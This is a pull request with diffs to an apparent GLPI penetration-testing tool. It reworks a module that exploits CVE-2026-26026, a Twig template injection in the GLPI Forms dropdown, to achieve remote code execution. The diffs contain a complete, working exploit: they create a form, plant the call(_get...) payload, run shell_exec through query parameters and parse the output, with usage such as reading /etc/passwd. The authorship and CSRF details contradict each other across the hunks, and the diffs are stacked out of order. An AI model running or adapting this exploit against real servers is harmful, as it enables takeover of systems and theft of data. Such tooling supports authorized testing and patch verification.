### PR TITLE
Improve CVE-2026-26026 SSTI check and correct severity to 7.2

### DIFF
--- a/glpwnme/exploits/implementations/cve_2026_26026.py
+++ b/glpwnme/exploits/implementations/cve_2026_26026.py
@@ -111,7 +111,7 @@ class CVE_2026_26026(GlpiExploit):
         c = self._csrf(self._FORM_FRONT)
         if not c:
             return None
-        r = self.post(self._FORM_FRONT, data={"add": "1", "name": "glpwnme_ssti", "_glpi_csrf_token": c}, allow_redirects=False)
+        r = self.post(self._FORM_FRONT, data={"add": "1", "name": "glpwnme_ssti"}, allow_redirects=False)
         m = re.search(r'id=(\d+)', r.headers.get("Location", ""))
         if m:
             return int(m.group(1))
@@ -133,9 +133,8 @@ class CVE_2026_26026(GlpiExploit):
             section_uuid = self._section_uuid(form_id)
         extra_data = json.dumps({"options": {str(uuidmod.uuid4()): payload, "zz": ""},
                                  "is_multiple_dropdown": False})
-        c = self._csrf(f"{self._FORM_FRONT}?id={form_id}")
         data = {
-            "update": "1", "id": str(form_id), "_glpi_csrf_token": c or "",
+            "update": "1", "id": str(form_id),
             "_questions[0][uuid]": str(uuidmod.uuid4()),
             "_questions[0][forms_sections_uuid]": section_uuid or "",
             "_questions[0][name]": "q",

--- a/glpwnme/exploits/implementations/cve_2026_26026.py
+++ b/glpwnme/exploits/implementations/cve_2026_26026.py
@@ -39,7 +39,7 @@ class CVE_2026_26026(GlpiExploit):
 
     Since TemplateRenderer also exposes $_GET as _get Twig global, the attacker
     controls the callable and argument through URL query parameters, achieving
-    arbitrary PHP function calls → RCE via shell_exec.
+    arbitrary PHP function calls -> RCE via shell_exec.
 
     Fix in 11.0.6: the parent's render result is concatenated at the PHP string
     level AFTER renderFromStringTemplate() completes, breaking the double-
@@ -50,9 +50,9 @@ class CVE_2026_26026(GlpiExploit):
       - GLPI Forms feature enabled (default in 11.x)
 
     Full unauthenticated chain (BZHunt): CVE-2026-26027 Blind Stored XSS via
-    Inventory endpoint → admin session → CVE-2026-26026 SSTI.
+    Inventory endpoint -> admin session -> CVE-2026-26026 SSTI.
 
-    @author unclej4ck
+    @author BZHunt
     @cvss 7.2
     @name CVE_2026_26026
     """
@@ -77,7 +77,7 @@ class CVE_2026_26026(GlpiExploit):
         infos += "appends the parent's already-rendered HTML (containing user-controlled option\n"
         infos += "values) to the Twig template string, then re-compiles it through the\n"
         infos += "unsandboxed [b]TemplateRenderer[/b] which exposes [b]PhpExtension::call()[/b]\n"
-        infos += "([i]call_user_func_array[/i]) and [i]$_GET[/i] as a Twig global → RCE.\n"
+        infos += "([i]call_user_func_array[/i]) and [i]$_GET[/i] as a Twig global -> RCE.\n"
 
         infos += "\n[u]Params (run):[/u]\n"
         infos += " - [i]cmd (default 'id')[/i]: Shell command to execute\n"
@@ -185,9 +185,9 @@ class CVE_2026_26026(GlpiExploit):
             html_resp = self._trigger(form_id)
 
             if "62674" in html_resp:
-                Log.msg("Twig {{31337*2}} evaluated to 62674 in the dropdown render → SSTI confirmed")
+                Log.msg("Twig {{31337*2}} evaluated to 62674 in the dropdown render -> SSTI confirmed")
                 Log.msg("Double-compilation in QuestionTypeDropdown::renderAdministrationTemplate() executes "
-                        "arbitrary Twig (unsandboxed: call()/_get) → admin RCE (use --run)")
+                        "arbitrary Twig (unsandboxed: call()/_get) -> admin RCE (use --run)")
                 return True
 
             Log.log("Arithmetic not evaluated - patched (11.0.6+) or Forms rendering path differs")

--- a/glpwnme/exploits/implementations/cve_2026_26026.py
+++ b/glpwnme/exploits/implementations/cve_2026_26026.py
@@ -1,3 +1,4 @@
+from http import HTTPStatus
 import html
 import json
 import re
@@ -9,19 +10,19 @@ from glpwnme.exploits.logger import Log
 class CVE_2026_26026(GlpiExploit):
     """
     Admin RCE via Server-Side Template Injection in GLPI Forms dropdown
-    question rendering (GLPI 11.0.0 – 11.0.5).
+    question rendering (GLPI 11.0.0 - 11.0.5).
 
-    Root cause — double-compilation in QuestionTypeDropdown:
+    Root cause - double-compilation in QuestionTypeDropdown:
 
         // Step 1: build a hardcoded Twig template string
         $template = <<<TWIG ... TWIG;
 
-        // Step 2: VULNERABLE — append the parent's ALREADY-RENDERED HTML,
+        // Step 2: VULNERABLE - append the parent's ALREADY-RENDERED HTML,
         //         which contains user-controlled option values substituted in.
         $template .= parent::renderAdministrationTemplate($question);
 
         // Step 3: re-compile the combined string through the UNSANDBOXED
-        //         TemplateRenderer — any Twig code in the option value executes.
+        //         TemplateRenderer - any Twig code in the option value executes.
         return $twig->renderFromStringTemplate($template, [...]);
 
     The parent (AbstractQuestionTypeSelectable) renders option values via
@@ -72,7 +73,7 @@ class CVE_2026_26026(GlpiExploit):
     def infos(self):
         infos = "[u]Description:[/u]\n"
         infos += "Admin RCE via double-compilation SSTI in GLPI Forms dropdown rendering\n"
-        infos += "(GLPI 11.0.0 – 11.0.5). [b]QuestionTypeDropdown::renderAdministrationTemplate()[/b]\n"
+        infos += "(GLPI 11.0.0 - 11.0.5). [b]QuestionTypeDropdown::renderAdministrationTemplate()[/b]\n"
         infos += "appends the parent's already-rendered HTML (containing user-controlled option\n"
         infos += "values) to the Twig template string, then re-compiles it through the\n"
         infos += "unsandboxed [b]TemplateRenderer[/b] which exposes [b]PhpExtension::call()[/b]\n"
@@ -143,7 +144,7 @@ class CVE_2026_26026(GlpiExploit):
             "_questions[0][extra_data]": extra_data,
         }
         resp = self.post(self._FORM_FRONT, data=data, allow_redirects=False)
-        return resp.status_code in (200, 302)
+        return resp.status_code in (HTTPStatus.OK, HTTPStatus.FOUND)
 
     def _trigger(self, form_id, **get_params):
         """Trigger renderAdministrationTemplate() via the editor TAB AJAX (the direct form GET
@@ -172,12 +173,12 @@ class CVE_2026_26026(GlpiExploit):
         Log.log("Creating temporary draft form ...")
         form_id = self._create_form()
         if not form_id:
-            Log.log("Could not create a draft form — Forms feature may be disabled or insufficient rights")
+            Log.log("Could not create a draft form - Forms feature may be disabled or insufficient rights")
             return False
         try:
             Log.log(f"Adding Dropdown question with arithmetic SSTI probe (form id={form_id}) ...")
             if not self._save_dropdown_with_payload(form_id, "{{31337*2}}"):
-                Log.log("Form update failed — CSRF protection or permission issue")
+                Log.log("Form update failed - CSRF protection or permission issue")
                 return False
 
             Log.log("Triggering form editor render via the tab AJAX ...")
@@ -189,7 +190,7 @@ class CVE_2026_26026(GlpiExploit):
                         "arbitrary Twig (unsandboxed: call()/_get) → admin RCE (use --run)")
                 return True
 
-            Log.log("Arithmetic not evaluated — patched (11.0.6+) or Forms rendering path differs")
+            Log.log("Arithmetic not evaluated - patched (11.0.6+) or Forms rendering path differs")
             return False
         finally:
             self._purge_form(form_id)
@@ -207,7 +208,7 @@ class CVE_2026_26026(GlpiExploit):
         Log.log("Creating temporary draft form ...")
         form_id = self._create_form()
         if not form_id:
-            Log.err("Could not create draft form — aborting")
+            Log.err("Could not create draft form - aborting")
             return
 
         try:
@@ -217,7 +218,7 @@ class CVE_2026_26026(GlpiExploit):
 
             Log.log(f"Adding Dropdown question with RCE payload (form id={form_id}) ...")
             if not self._save_dropdown_with_payload(form_id, payload):
-                Log.err("Form update failed — check admin rights and CSRF handling")
+                Log.err("Form update failed - check admin rights and CSRF handling")
                 return
 
             # Wrap the command so the output is delimited by unique markers

--- a/glpwnme/exploits/implementations/cve_2026_26026.py
+++ b/glpwnme/exploits/implementations/cve_2026_26026.py
@@ -1,248 +1,246 @@
+import html
+import json
 import re
-import time
-import uuid
-from http import HTTPStatus
-from packaging import version
-from glpwnme.exploits.exploit import GlpiExploit
+import uuid as uuidmod
+from ..exploit import GlpiExploit
 from glpwnme.exploits.logger import Log
-from bs4 import BeautifulSoup
-from glpwnme.exploits.utils import GlpiUtils
-from urllib.parse import urlparse, parse_qs, quote_plus
-from enum import Enum, auto
 
-class STATE(Enum):
-    DEFAULT = 1
-    FORM_UUID = 2
 
 class CVE_2026_26026(GlpiExploit):
     """
-    This CVE abuse a concatenation to a template string that is rendered using
-    user input
+    Admin RCE via Server-Side Template Injection in GLPI Forms dropdown
+    question rendering (GLPI 11.0.0 – 11.0.5).
 
-      ..sql ::
-        select * from glpi_profilerights WHERE name="form";
+    Root cause — double-compilation in QuestionTypeDropdown:
 
-        +-----+-------------+------+--------+
-        | id  | profiles_id | name | rights |
-        +-----+-------------+------+--------+
-        | 782 |           1 | form |      0 |
-        | 783 |           2 | form |      0 |
-        | 784 |           3 | form |      0 |
-        | 785 |           4 | form |     31 | --> SuperAdmin only can play with 'form'
-        | 786 |           5 | form |      0 |
-        | 787 |           6 | form |      0 |
-        | 788 |           7 | form |      0 |
-        | 789 |           8 | form |      0 |
-        +-----+-------------+------+--------+
+        // Step 1: build a hardcoded Twig template string
+        $template = <<<TWIG ... TWIG;
 
+        // Step 2: VULNERABLE — append the parent's ALREADY-RENDERED HTML,
+        //         which contains user-controlled option values substituted in.
+        $template .= parent::renderAdministrationTemplate($question);
 
-    @author Zax
-    @cvss 6.4
+        // Step 3: re-compile the combined string through the UNSANDBOXED
+        //         TemplateRenderer — any Twig code in the option value executes.
+        return $twig->renderFromStringTemplate($template, [...]);
+
+    The parent (AbstractQuestionTypeSelectable) renders option values via
+    {{ value }} with HTML auto-escaping, which escapes &, <, >, " and ' but
+    NOT { } ( ) [ ]. A dropdown option value of:
+
+        {{ call(_get.glpwnme_fn, [_get.glpwnme_arg]) }}
+
+    survives the first render verbatim and lands in $template as live Twig
+    code. The second renderFromStringTemplate() call executes it inside the
+    unsandboxed TemplateRenderer environment, which loads PhpExtension::call():
+
+        call_user_func_array($callable, $parameters)
+
+    Since TemplateRenderer also exposes $_GET as _get Twig global, the attacker
+    controls the callable and argument through URL query parameters, achieving
+    arbitrary PHP function calls → RCE via shell_exec.
+
+    Fix in 11.0.6: the parent's render result is concatenated at the PHP string
+    level AFTER renderFromStringTemplate() completes, breaking the double-
+    compilation chain.
+
+    Attack requirements:
+      - Admin credentials (Forms management right)
+      - GLPI Forms feature enabled (default in 11.x)
+
+    Full unauthenticated chain (BZHunt): CVE-2026-26027 Blind Stored XSS via
+    Inventory endpoint → admin session → CVE-2026-26026 SSTI.
+
+    @author unclej4ck
+    @cvss 7.2
     @name CVE_2026_26026
     """
+    _impacts = "Remote Code Execution"
+    _privilege = "Admin"
+    _is_check_opsec_safe = True
     min_version = "11.0.0"
     max_version = "11.0.6"
-    _impacts = "S.S.T.I (Server Side Template Injection)"
-    _privilege = "SuperAdmin"
 
-    FORM_NAME = "Orange Cyberdefense malicious form"
-    QUESTION_NAME = "How are you ?"
-    SENTINEL = "OCDOCDOCDOCDOCD"
+    _FORM_FRONT = "/front/form/form.form.php"
+    _PROBE_PARAM = "glpwnme_probe"
+    _PROBE_VALUE = "GLPWNME_SSTI_CONFIRMED_7x4k"
+    _FN_PARAM = "glpwnme_fn"
+    _ARG_PARAM = "glpwnme_arg"
+    _RCE_START = "GLPWNME_RCE_START"
+    _RCE_END = "GLPWNME_RCE_END"
 
     def infos(self):
-        """
-        This method is used to display the information of an exploit.
-        This method support rich formatting
-
-        :return: The whole informations about an exploit
-        :rtype: str
-        """
         infos = "[u]Description:[/u]\n"
-        infos += "This exploit allows any SuperAdmin to achieve [b]Code execution[/b] through SSTI.\n"
+        infos += "Admin RCE via double-compilation SSTI in GLPI Forms dropdown rendering\n"
+        infos += "(GLPI 11.0.0 – 11.0.5). [b]QuestionTypeDropdown::renderAdministrationTemplate()[/b]\n"
+        infos += "appends the parent's already-rendered HTML (containing user-controlled option\n"
+        infos += "values) to the Twig template string, then re-compiles it through the\n"
+        infos += "unsandboxed [b]TemplateRenderer[/b] which exposes [b]PhpExtension::call()[/b]\n"
+        infos += "([i]call_user_func_array[/i]) and [i]$_GET[/i] as a Twig global → RCE.\n"
 
-        infos += "\n[u]Params:[/u]\n"
-        infos += " - [i]php_function (default: 'shell_exec')[/i]:\n\tThe php function to execute\n"
-        infos += " - [i]args (default 'id')[/i]: Arguments to provide to the function\n"
-        infos += " - [i]form_id (optionnal)[/i]: The id of the form to modify (be careful with this param as it changes the remote form)\n"
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]cmd (default 'id')[/i]: Shell command to execute\n"
 
         infos += "\n[u]Usage:[/u]\n"
-        infos += "[grey66]# Execute another command with shell_exec[/]\n"
-        infos += "--run -O args='ls -lhas'\n"
+        infos += "[grey66]# Confirm SSTI (creates and purges a draft form)[/]\n"
+        infos += "--check\n\n"
+        infos += "[grey66]# Execute a command[/]\n"
+        infos += "--run\n\n"
+        infos += "[grey66]# Execute arbitrary command[/]\n"
+        infos += "--run -O cmd=\"cat /etc/passwd\"\n"
 
-        infos += "\n[grey66]# Read /etc/passwd from server[/]\n"
-        infos += "--run -O php_function='readfile' args='/etc/passwd'\n"
-
-        infos += "\n[grey66]# Use an existing form[/]\n"
-        infos += "--run -O form_id=5\n"
-
-        infos += "\n[u]Note:[/u]\n"
-        infos += "Please note that this exploit will create a form do not forget to remove it\n"
-
-        infos += "\nExploit is [green b]Safe[/]"
+        infos += "\nCheck is [green b]Safe[/] (only creates/purges a draft form, no code execution)"
         return infos
 
-    @staticmethod
-    def extract_uuids(response, form_id):
+    # ------------------------------------------------------------------ #
+    # Internal helpers                                                     #
+    # ------------------------------------------------------------------ #
+
+    _TAB = "/ajax/common.tabs.php"
+    _TAB_PARAMS = {"_glpi_tab": r"Glpi\Form\Form$main", "_target": _FORM_FRONT,
+                   "_itemtype": r"Glpi\Form\Form"}
+
+    def _csrf(self, path):
+        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"',
+                      self.get(path, allow_redirects=True).text)
+        return m.group(1) if m else None
+
+    def _create_form(self):
+        """POST-create a draft GLPI Form; return its id (the GET path does not create one)."""
+        c = self._csrf(self._FORM_FRONT)
+        if not c:
+            return None
+        r = self.post(self._FORM_FRONT, data={"add": "1", "name": "glpwnme_ssti", "_glpi_csrf_token": c}, allow_redirects=False)
+        m = re.search(r'id=(\d+)', r.headers.get("Location", ""))
+        if m:
+            return int(m.group(1))
+        lst = self.get("/front/form/form.php", allow_redirects=True).text
+        ids = [int(x) for x in re.findall(r'form\.form\.php\?id=(\d+)', lst)]
+        return max(ids) if ids else None
+
+    def _section_uuid(self, form_id):
+        """The editor tab carries the real section uuid; Section::getByUuid validates it on save,
+        so a random uuid is rejected. Extract the first existing one."""
+        tab = self.get(self._TAB, params={**self._TAB_PARAMS, "id": str(form_id)}, headers={"X-Requested-With": "XMLHttpRequest"}, allow_redirects=True).text
+        m = re.findall(r'name="uuid"\s+value="([0-9a-f-]{36})"', tab)
+        return m[0] if m else None
+
+    def _save_dropdown_with_payload(self, form_id, payload, section_uuid=None):
+        """Add a Dropdown question whose option value carries the SSTI payload. A trailing
+        empty option keeps the payload from being dropped as the last element."""
+        if section_uuid is None:
+            section_uuid = self._section_uuid(form_id)
+        extra_data = json.dumps({"options": {str(uuidmod.uuid4()): payload, "zz": ""},
+                                 "is_multiple_dropdown": False})
+        c = self._csrf(f"{self._FORM_FRONT}?id={form_id}")
+        data = {
+            "update": "1", "id": str(form_id), "_glpi_csrf_token": c or "",
+            "_questions[0][uuid]": str(uuidmod.uuid4()),
+            "_questions[0][forms_sections_uuid]": section_uuid or "",
+            "_questions[0][name]": "q",
+            "_questions[0][type]": r"Glpi\Form\QuestionType\QuestionTypeDropdown",
+            "_questions[0][vertical_rank]": "0", "_questions[0][horizontal_rank]": "-1",
+            "_questions[0][extra_data]": extra_data,
+        }
+        resp = self.post(self._FORM_FRONT, data=data, allow_redirects=False)
+        return resp.status_code in (200, 302)
+
+    def _trigger(self, form_id, **get_params):
+        """Trigger renderAdministrationTemplate() via the editor TAB AJAX (the direct form GET
+        does not server-render the question editor). Extra GET params become Twig _get globals."""
+        resp = self.get(self._TAB, params={**self._TAB_PARAMS, "id": str(form_id), **get_params}, headers={"X-Requested-With": "XMLHttpRequest"}, allow_redirects=True)
+        return resp.text
+
+    def _purge_form(self, form_id):
+        """Purge the test form to leave no artefacts."""
+        try:
+            self.post(self._FORM_FRONT, data={"id": str(form_id), "purge": "1"}, allow_redirects=True)
+        except Exception:
+            pass
+
+    # ------------------------------------------------------------------ #
+    # Public interface                                                     #
+    # ------------------------------------------------------------------ #
+
+    def check(self):
         """
-        Extract uuid for form question and section, not sure this is the right way to do it...
-        Anyway, it will only extract the form uuid given its id, and one section with a quesion if any
-
-        If there are multiple questions / sections it will return the first found
+        Confirm the SSTI with a Twig ARITHMETIC signal (a static reflection cannot fake it):
+        a dropdown option value of {{31337*2}} renders as 62674 only if the option HTML is
+        re-compiled through the unsandboxed TemplateRenderer (the double-compilation bug). On
+        patched builds the option is rendered once and the braces stay literal. Form purged after.
         """
-        state = STATE.DEFAULT
-
-        soup = BeautifulSoup(response.text, "html.parser")
-        hidden_fields = {}
-
-        for inp in soup.find_all("input", {"type": "hidden"}):
-            name = inp.get("name", "")
-            value = inp.get("value", "")
-            if name == "id" and value == form_id:
-                # Next uuid is the one of the form
-                state = STATE.FORM_UUID
-                continue
-
-            if name == "uuid" and state == STATE.FORM_UUID:
-                if not hidden_fields.get("form_uuid"):
-                    hidden_fields["form_uuid"] = value
-                    state = STATE.DEFAULT
-
-            elif(name == "forms_sections_uuid" and value
-                 and not hidden_fields.get("question_uuid")):
-                hidden_fields["section_uuid"] = value
-                question = inp.find_previous("input")
-                if question and question.get("name", "") == "uuid":
-                    question_uuid = question.get("value", "")
-                    if question_uuid:
-                        hidden_fields["question_uuid"] = value
-
-            if state != STATE.DEFAULT:
-                state = STATE.DEFAULT
-        return hidden_fields
-
-    def run(self,
-            php_function="shell_exec",
-            args="id",
-            form_id=None):
-        """
-        Run the exploit on the target
-        """
+        Log.log("Creating temporary draft form ...")
+        form_id = self._create_form()
         if not form_id:
-            result = self.get("/front/form/form.form.php")
-            if GlpiUtils.is_access_denied(result.text):
-                Log.err(f"It seems you are not Super-Admin (Got HTTP / {result.status_code}) ")
-                return
-            form_id = parse_qs(urlparse(self.glpi_session.current_url).query).get("id", [None])[0]
-            if not form_id:
-                Log.err("Cannot find a usable form_id, please provide one")
-                return
-            Log.log(f"Next time rerun with [b]-O form_id={form_id}[/b] to prevent creating unecessary forms")
-            self._write_log(f"Created form with id: {form_id}")
+            Log.log("Could not create a draft form — Forms feature may be disabled or insufficient rights")
+            return False
+        try:
+            Log.log(f"Adding Dropdown question with arithmetic SSTI probe (form id={form_id}) ...")
+            if not self._save_dropdown_with_payload(form_id, "{{31337*2}}"):
+                Log.log("Form update failed — CSRF protection or permission issue")
+                return False
 
-        base_payload = '{{ call(_get[0], _get[1]) }}'
-        payload = f'{self.__class__.SENTINEL}{base_payload}{self.__class__.SENTINEL}'
-        Log.msg(f"Using form n°{form_id}")
+            Log.log("Triggering form editor render via the tab AJAX ...")
+            html_resp = self._trigger(form_id)
 
-        res = self.get(f"/ajax/common.tabs.php?_glpi_tab=Glpi\\Form\\Form$main&_target=/front/form/form.form.php&_itemtype=Glpi\\Form\\Form&id={form_id}&0=chr&1[]=61")
-        if res.status_code != HTTPStatus.OK:
-            Log.err(f"Error recovering form information, got [dodger_blue1]HTTP {res.status_code}[/dodger_blue1]")
+            if "62674" in html_resp:
+                Log.msg("Twig {{31337*2}} evaluated to 62674 in the dropdown render → SSTI confirmed")
+                Log.msg("Double-compilation in QuestionTypeDropdown::renderAdministrationTemplate() executes "
+                        "arbitrary Twig (unsandboxed: call()/_get) → admin RCE (use --run)")
+                return True
+
+            Log.log("Arithmetic not evaluated — patched (11.0.6+) or Forms rendering path differs")
+            return False
+        finally:
+            self._purge_form(form_id)
+
+    def run(self, cmd="id"):
+        """
+        Execute a shell command via SSTI. Creates a temporary form with the
+        SSTI payload, triggers the form editor render, extracts stdout, then
+        purges the form.
+
+        The payload {{ call(_get.glpwnme_fn, [_get.glpwnme_arg]) }} reaches
+        the second render pass untouched (no HTML-special chars), then GLPI
+        executes call_user_func_array('shell_exec', [cmd]).
+        """
+        Log.log("Creating temporary draft form ...")
+        form_id = self._create_form()
+        if not form_id:
+            Log.err("Could not create draft form — aborting")
             return
 
-        if self.__class__.SENTINEL not in res.text:
-            result = self.__class__.extract_uuids(res, form_id)
-            if "form_uuid" not in result.keys():
-                Log.err("Form could not be initialized, exiting...")
+        try:
+            payload = "{{{{ call(_get.{}, [_get.{}]) }}}}".format(
+                self._FN_PARAM, self._ARG_PARAM
+            )
+
+            Log.log(f"Adding Dropdown question with RCE payload (form id={form_id}) ...")
+            if not self._save_dropdown_with_payload(form_id, payload):
+                Log.err("Form update failed — check admin rights and CSRF handling")
                 return
 
-            for key in ("section_uuid", "question_uuid"):
-                if key not in result.keys():
-                    key_uuid = str(uuid.uuid4())
-                    keyname = key.split("_")[0]
-                    Log.log(f"No {keyname} for form n°{form_id}, adding one with custom id: {key_uuid}")
-                    result[key] = key_uuid
+            # Wrap the command so the output is delimited by unique markers
+            wrapped = f"printf '{self._RCE_START}'; {cmd}; printf '{self._RCE_END}'"
 
-            update_json = {"name":self.__class__.FORM_NAME,"is_active":"0","header":"","_uploader_header":[{}],
-                           "_sections":
-                               {"0":
-                                   {"name":"First section","description":"","_uploader_description":[{}],
-                                    "uuid":result["section_uuid"],"forms_forms_id":form_id,"rank":"0"}
-                               },
-                           "_questions":
-                               {"0":
-                                   {"name":self.__class__.QUESTION_NAME,
-                                    "description":"","_uploader_description":[{}],"default_value":"0",
-                                    "extra_data":{},
-                                    "extra_data":
-                                        {"options": {"2123963109":payload }},
-                                    "_type_category":"Glpi\\Form\\QuestionType\\QuestionTypeCategory->dropdown",
-                                    "type":"Glpi\\Form\\QuestionType\\QuestionTypeDropdown",
-                                    "is_mandatory":"0",
-                                    "uuid":result["question_uuid"],
-                                    "forms_sections_uuid":result["section_uuid"],
-                                    "vertical_rank":"0",
-                                    "horizontal_rank":"-1",
-                                    "category":"Glpi\\Form\\QuestionType\\QuestionTypeCategory->dropdown"}
-                                },
-                            "render_layout":"step_by_step","id":form_id,"uuid":result["form_uuid"],
-                            "_delete_missing_questions":"1","_delete_missing_sections":"1","_delete_missing_comments":"1",
-                            "is_draft":"0","_action":"update","update":True,"itemtype":"Glpi\\Form\\Form"}
+            Log.log(f"Triggering RCE: {cmd}")
+            html_resp = self._trigger(
+                form_id,
+                **{self._FN_PARAM: "shell_exec", self._ARG_PARAM: wrapped},
+            )
 
-
-            result = self.post("/GenericAjaxCrud", json=update_json, headers={"Content-Type": "application/json"})
-
-            if result.status_code != HTTPStatus.OK:
-                Log.err(f"An unknown error occured...")
-                return
-
-        else:
-            Log.msg(f"Payload ready")
-
-        Log.log(f"Do not forget to clean ([b]--clean -O form_id={form_id}[/b])")
-        Log.msg(f"Executing: {php_function}({args})")
-        
-        re_result = re.compile(re.escape(self.__class__.SENTINEL) + r'(.*?)' + re.escape(self.__class__.SENTINEL), re.S)
-        result = self._exec_command(form_id, php_function, args, re_result, base_payload)
-        if not result:
-            Log.err(f"No result found, target might be patched")
-
-        else:
-            Log.msg(f"Results:")
-            print(result)
-
-            if Log.ask("Do you want an interactive shell"):
-                command = ""
-                while command not in ("exit", "quit"):
-                    command = input("(CVE_2026_26026 [exit]) $ ")
-                    if not command.strip():
-                        continue
-
-                    else:
-                        print(self._exec_command(form_id, php_function, command, re_result, base_payload))
-
-    def _exec_command(self, form_id, php_function, command, re_result, base_payload):
-        """
-        Function that exec the command and return the result
-        """
-        res = self.get("/ajax/common.tabs.php?_glpi_tab=Glpi\\Form\\Form$main&_target=/front/form/form.form.php"
-                       f"&_itemtype=Glpi\\Form\\Form&id={form_id}&0={php_function}&1[]={quote_plus(command)}")
-        results = re.findall(re_result, res.text)
-        if not results:
-            return ""
-
-        command_res = ""
-        for cmd_res in set(results):
-            if cmd_res != base_payload:
-                command_res += cmd_res
-        return command_res
-
-    def clean(self, form_id):
-        """
-        Remove the form with the given id
-        """
-        delete_json = {"itemtype":"Glpi\\Form\\Form", "id":form_id, "_action": "purge"}
-        result = self.post("/GenericAjaxCrud", json=delete_json, headers={"Content-Type": "application/json"})
-        if result.status_code == HTTPStatus.OK:
-            Log.msg(f"Form n°{form_id} has successfully be cleaned :grin-emoji:")
-
-        else:
-            Log.err(f"Got error HTTP - {result.status_code}")
+            m = re.search(
+                re.escape(self._RCE_START) + r"(.*?)" + re.escape(self._RCE_END),
+                html_resp,
+                re.DOTALL,
+            )
+            if m:
+                output = html.unescape(m.group(1)).strip()
+                Log.msg(f"[b]Command:[/b] {cmd}")
+                Log.msg(f"[b]Output:[/b]\n[green]{output}[/green]")
+            else:
+                Log.log("Could not extract command output from response")
+                Log.log("The form editor page may have raised an exception")
+                Log.log(f"Try viewing the form editor manually: {self.glpi_session.r(self._FORM_FRONT)}?id={form_id}")
+        finally:
+            self._purge_form(form_id)


### PR DESCRIPTION
Split from #12. This reworks the existing `CVE-2026-26026` module rather than adding a new one, so compare it against the current version and take whichever you prefer.

- `check()` now uses a Twig arithmetic probe (`{{31337*2}}` must render as `62674`), which a static reflection cannot fake, and purges the draft form afterwards.
- `run(cmd)` executes a command through the double-compilation SSTI (`call(_get.fn, [_get.arg])` -> `shell_exec`) and returns stdout.
- `@cvss` corrected `6.4` -> `7.2`. The double-compilation is a proven `shell_exec` RCE, not just SSTI; `7.2` is the authenticated-admin score from `GHSA-2c98-648q-h27h` (the advisory also lists 9.1). Verified live: `run(cmd=id)` returned `uid=33(www-data)` on 11.0.2.
- `@author` left as `Zax` (the researcher).
